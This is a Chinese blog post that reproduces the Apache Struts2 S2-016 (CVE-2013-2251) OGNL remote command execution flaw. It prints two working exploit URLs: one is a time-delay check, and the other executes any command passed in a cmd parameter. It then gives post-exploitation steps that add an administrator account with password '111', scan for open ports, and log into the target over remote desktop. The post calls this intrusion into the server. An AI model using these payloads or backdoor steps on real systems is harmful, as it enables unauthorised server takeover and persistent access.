Struts2-016命令执行漏洞

最新推荐文章于 2024-06-08 07:30:31 发布
置顶 最新推荐文章于 2024-06-08 07:30:31 发布
阅读量7.5k 收藏 14
点赞数 4
分类专栏: 漏洞复现 文章标签: Struts2-016命令执行漏洞 Struts2-016命令执行漏洞复现 CVE-2013-2251 漏洞复现 Struts2-016命令执行漏洞实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41880069/article/details/89857081
版权

Struts2-016命令执行漏洞

一:前言

CVE-2013-2251 漏洞概述:

Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令。redirect:和redirectAction:此两项前缀为Struts默认开启功能,目前Struts 2.3.15.1以下版本均存在此漏洞。

二:漏洞复现

★注:一般struts2漏洞有一个明显的特征就是url路径里有*.action或*.do
在这里插入图片描述

2.1:手工利用

2.1.1:POC验证

poc1:如果存在漏洞则目标服务器会在请求发出后停顿5秒后,把数据返回给浏览器

http://xxx.com/test.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28d%29%28%28%27@java.lang.Thread@sleep%285000%29%27%29%28d%29%29

poc2:如果存在该漏洞,则会把命令ipconfig的执行结果返回

http://xxx.com/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[200]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cmd%20/c%20ipconfig

2.1.2:验证结果

poc1:在经过5秒后返回请求结果

在这里插入图片描述

poc2:显示IP信息

在这里插入图片描述

2.2:工具利用

工具使用很简单,直接先检测验证漏洞是否存在,然后执行命令或者文件上传

在这里插入图片描述

3:漏洞利用

3.1:命令执行

  • whoami:查看当前用户
  • ipconfig/ifconfig:查看IP地址方便进行下一步的利用
  • net user 111 111/add:添加用户(这里添加了一个密码为111用户名为111的用户
  • net localgroup administrators 111/add:将111用户添加到administrator用户组里

3.2:nmap扫描查看开放端口

可以看到开放了3389远程连接端口,目标系统为Windows Server 2003 3790 Service Pack 2

在这里插入图片描述

3.3:远程连接

用添加的111用户远程连接

在这里插入图片描述

  • win+R ,输入mstsc ,设置连接地址,在登陆界面输入新建用户名及密码,进行连接
  • 连接成功,登陆入侵该服务器

在这里插入图片描述

MX-LQ
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Struts2漏洞利用工具2016
07-26
Struts2漏洞利用工具2016版,基本信息,命令执行,文件上传,批量验证,文件管理
struts2-016/017漏洞解决
03-21
在不升级原框架的基础上解决漏洞
[漏洞复现]Struts2-016命令执行漏洞复现
wwxxee
05-20 3414
Struts2-016命令执行漏洞 Struts2有很多漏洞,但是很多老系统都漏补了这个洞,成功率较高。 影响版本: 2.0.0 - 2.3.15 简述 Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令。redirect:和redirectAction:此两项前缀为Struts默认开启功能。 在s
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
最新发布
qq_53058639的博客
06-08 1421
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。在账号密码的输入框中测试是否存在漏洞
墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现
weixin_42789937的博客
02-24 842
墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现,参考大佬的wp,是第二版,补充了一些下载御剑、maltego的错误解题过程(●'◡'●)~
Struts2(s2-016)远程代码执行漏洞详细代码分析
excite 的专栏
07-25 2460
之前winwin已经发过这个漏洞的分析文章,分析的很到位,不过有几个点有些问题,所以我在这里把自己的分析内容发出来,供各位参考。   这个漏洞的数据污染点和触发点,和其他的Struts不一样,所以本篇分析将从Struts执行流程中剖析此漏洞。在Struts2.3以后,官方将原有的起始过滤器换为:org.apache.struts2.dispatcher.ng.filter.StrutsPrepa
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2403
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者执行恶意代码,从而危害到网站的安全。 S2-016 漏洞是由于 Struts2 的 Ognl 表达式语言解析器存在缺陷,从而导致攻击者...
Struts2-Scan:Struts2漏洞扫描利用工具
05-04
Struts2-ScanStruts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
burplugin-java-rce:******本软件仅用于学习交流禁止用于任何非法行为******本版本支持elasticsearch java语言远程命令执行及文件上传elasticsearchgroov语言远程命令执行及文件上传struts2-005, struts2-009,struts2-013,struts2-016struts2-019,struts2-020,struts2-devmode,struts2-032,struts2-033,struts2-037,struts2-045,
03-23
本版本支持elasticsearch java语言远程命令执行及文件上传elasticsearchgroov语言远程命令执行及文件上传struts2-005,struts2-009,struts2-013,struts2-016struts2-019,struts2-020,struts2-devmode,struts2-032,struts2-033 ,struts2-037,struts2-045,struts2-048,struts2-052除struts2-053全部RCE验证并支持批量验证。Struts2验证需要python环境并需要相关类库支持。 。如果初始化失败请按照以下步骤安装类库:1,执行$ [python] / Scrips / easy_install pip 2,请求模块安装方法pip安装请求3,termcolor模块安装方法:pip install termco
struts2_S016_S017_repair
08-28
官方描述: S2-016:https://cwiki.apache.org/confluence/display/WW/S2-016 S2-017:https://cwiki.apache.org/confluence/display/WW/S2-017 官方建议修复方案:升级到最新版本 struts-2.3.15.1 但通常现有系统升级,可能导致不稳定及与其他框架比如spring等的不兼容,成本较高。 鉴于此本人整理了一种既可以不用升级现有struts版本,有能完美解决这两个漏洞的方案,
Struts2远程命令执行验证工具
11-22
1. **快速检测**:该工具能够迅速扫描并检测出是否存在Struts2远程命令执行漏洞,节省了手动检查的时间和精力。 2. **批量导入验证**:对于大型网络环境,支持批量导入多个目标URL,进行批量检测,提高了工作效率。...
Struts2漏洞之S2-016漏洞分析与exp编写
热门推荐
Exploit的小站~
05-10 3万+
 1、概述 S2-016是13年7月爆出的,那时候的我还没涉及Web安全研究。这次迟到的分析也算是对过去的补充。这个漏洞影响了Struts 2.3.15.1之前的所有版本。问题主要出在对于特殊URL处理中,redirect与redirectAction后面跟上Ognl表达式会被服务器执行。 2、漏洞分析 分析开源框架的漏洞还是从其源码入手,问题出在了DefaultActiion...
struts2漏洞_渗透测试之命令执行漏洞
weixin_39669982的博客
11-30 527
渗 透 测 试之 命 令 执 行 漏 洞前言 远程命令执行漏洞,不仅存在于B/S中,同样存在于C/S中,用户在客户端(浏览器)提交并执行命令。由于服务器端没有对用户可控函数做相应过滤,导致在没有指定绝对路径的情况下就执行命令,致使攻击者将恶意系统命令拼接到正常命令执行,从而造成命令执行攻击。1原理开发人员在编写源码时,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以将恶...
【研究】Struts2漏洞之S2-016漏洞环境和POC
god_Zeo的安全博客
07-02 2423
【研究】Struts2漏洞之S2-016漏洞环境和POC1.环境2.原理3.影响版本4.利用过程POCPOC注意 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 在struts2中,DefaultActionMapper类支持以"action:"、“r...
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9486
前言: 本篇文章中复现漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
Struts2 S2-001漏洞分析:命令执行与防御策略
"Struts2 S2-001漏洞的分析与理解" Struts2是一个流行的Java MVC框架,用于构建企业级Web应用程序。然而,Struts2框架在其早期版本中存在一个名为S2-001的安全漏洞。这个漏洞影响了从Struts2.0.0到Struts2.0.8的...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值